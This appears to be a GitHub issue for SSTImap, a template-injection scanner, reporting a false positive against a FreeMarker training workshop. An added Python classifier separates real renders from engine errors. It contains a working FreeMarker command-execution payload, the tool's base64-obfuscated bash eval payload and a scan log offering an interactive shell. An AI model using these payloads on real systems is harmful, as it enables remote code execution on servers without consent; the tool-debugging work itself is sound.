
SSTImap should test simple payload, otherwise may return false positive result #30

@alasalamont

Hi brother,
I tested SSTImap on this workshop, at 25_template_freemarker:

https://gosecure.github.io/template-injection-workshop/

When I use a simple payload, it works:

<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id")}

But when the tool uses its own payload, it does not work:

${7670795914?c}<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<ZWNobyBhMA==|{base64,--decode})}") }${7841412055?c}

The site returns:

Template blocked: Cannot run program "bash": error=2, No such file or directory ---- FTL stack trace ("~" means nesting-related): - Failed at: ${ex("bash -c {eval,$({tr,/+,_-}\l\l\... [in template "tpl" at line 1, column 72] ----

Because of this, the tool also returns a false positive result:

┌──(root㉿kali)-[/home/kali/Desktop/SSTImap]
└─# python3 sstimap.py -u "http://localhost:8025/admin/edit_page/1" -d "_csrf=ddcf50d0-b5a0-43f5-95dd-351495abc31b&title=Welcome+Page&templateCode=*&action=test" -C "JSESSIONID=182F5156C0D7E1B0A0E72D87D3D4F845" --proxy http://localhost:8080 -l 5 -e Freemarker

[*] Version: 1.1.4
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 5; legacy_engines: 1; engines: 16

[*] Scanning url: http://localhost:8025/admin/edit_page/1
[*] Testing if POST parameter 'templateCode' is injectable
[*] Freemarker plugin is testing rendering with tag '*'
[+] Freemarker plugin has confirmed injection with tag '*'
[+] SSTImap identified the following injection point:

  POST parameter: templateCode
  Engine: Freemarker
  Injection: *
  Context: text
  OS: undetected
  Technique: render
  Capabilities:

    Shell command execution: no
    Bind and reverse shell: no
    File write: no
    File read: no
    Code evaluation: no

[+] Rerun SSTImap providing one of the following options:
    --tpl-shell                  Prompt for an interactive shell on the template engine.
    --tpl-cmd                    Inject code in the template engine.
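The issue above is a verification gap: the scanner reports "confirmed injection" on the render check even though the command-bearing payload came back as a FreeMarker error, so every capability is "no" and the finding needs manual triage. The following is an added example (not SSTImap's code, and not from the workshop) of how a response classifier can tell a genuinely rendered marker pair apart from an engine error or a plain reflection of the payload. It reuses the two numeric markers from the payload quoted in the issue and assumes that the base64 string in that payload decodes to `echo a0`, so a working run must print `a0` between the markers; the sample response bodies are constructed for the example.

```python
import re

# Markers taken from the payload quoted in the issue: ${7670795914?c} ... ${7841412055?c}
# wrap the command. The base64 "ZWNobyBhMA==" in that payload decodes to "echo a0",
# so a successfully executed command renders "a0" between the two markers (assumption).
PREFIX = "7670795914"
SUFFIX = "7841412055"
EXPECTED = "a0"

# Fragments that indicate the engine raised an error instead of rendering.
# The first one is verbatim from the response quoted in the issue.
ERROR_HINTS = ("Cannot run program", "FTL stack trace")

# Fragments of raw FreeMarker syntax: if they come back unchanged, the
# application only reflected our input and did not evaluate it.
REFLECTION_HINTS = ("?new()", "?c}")


def classify_render(body: str, prefix: str = PREFIX, suffix: str = SUFFIX,
                    expected: str = EXPECTED) -> str:
    """Classify one HTTP response body for a marker-wrapped payload.

    'confirmed'   - both markers rendered and exactly the expected output sits between them
    'blocked'     - the engine reported an error (missing binary, sandbox, syntax error)
    'reflected'   - the template syntax came back unrendered (no evaluation at all)
    'unconfirmed' - markers absent, or unexpected content between them
    """
    if any(hint in body for hint in ERROR_HINTS):
        return "blocked"
    if any(hint in body for hint in REFLECTION_HINTS):
        return "reflected"
    match = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if match is None:
        return "unconfirmed"
    # Normalise trailing newline added by the shell's echo before comparing.
    return "confirmed" if match.group(1).strip() == expected else "unconfirmed"


# Constructed sample responses illustrating the four outcomes (not captured traffic).
SAMPLE_RESPONSES = {
    "working":   "<pre>7670795914a0\n7841412055</pre>",
    "no_bash":   ('Template blocked: Cannot run program "bash": error=2, '
                  'No such file or directory ---- FTL stack trace ("~" means nesting-related)'),
    "reflected": ('7670795914?c}<#assign ex="freemarker.template.utility.Execute"?new()>'
                  '${ ex("id") }${7841412055?c}'),
    "unrelated": "<h1>Welcome Page</h1>",
}


def triage(responses: dict) -> dict:
    """Classify every response; only 'confirmed' should count as a verified finding."""
    return {name: classify_render(body) for name, body in responses.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_RESPONSES).items():
        print(f"{name:10s} -> {verdict}")
```

Running the block prints `confirmed` only for the response whose markers wrap the expected output; the "no bash" error that the issue quotes is classified as `blocked` rather than as a confirmed injection, which is the distinction the reporter is asking for.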

Labels: awaits confirmation (The issue is supposed to be resolved, but requires some testing); delayed (The issue will be fixed with a big update later)